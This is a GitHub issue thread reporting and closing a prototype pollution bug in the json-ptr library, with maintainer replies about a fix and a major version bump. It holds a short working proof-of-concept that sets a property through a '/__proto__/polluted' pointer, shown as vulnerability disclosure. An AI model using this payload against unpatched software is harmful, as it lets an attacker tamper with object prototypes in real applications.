Prototype pollution (Fixed)

flitbit / json-ptr

A complete implementation of JSON Pointer (RFC 6901) for nodejs and modern browsers.

MIT License

91 stars 28 forks source link

Prototype pollution (Fixed) #26

Closed luci-m-666 closed 3 years ago

luci-m-666 commented 3 years ago

Hi, This package is vulnerable to prototype pollution. POC

var {JsonPointer } = require("json-ptr")
var obj = {}
console.log("Before : " + obj.polluted);
JsonPointer.set(obj,'/__proto__/polluted','Yes! Its Polluted', true);
var obj1 ={}
console.log("After : " + obj1.polluted);

Fixed prototype pollution in util.ts. Thanks

flitbit commented 3 years ago

Thanks for the PR. I added a test; since pollution is now disallowed, I test that the error is thrown.

flitbit commented 3 years ago

Will be v2.0.0 shortly; seems it is potentially a breaking change if someone was using such pointers.

luci-m-666 commented 3 years ago

Glad to be of help.

alromh87 commented 3 years ago

Hello @luci-m-666 , I'm a little curious as it how you found prototype pollution in the library and how you came up with this exact lines:

https://github.com/418sec/json-ptr/pull/1/files#diff-3294a832ea2276e554177e0b3007cc2d401c082912c7fbde49fa09141bf1aed1R175-R177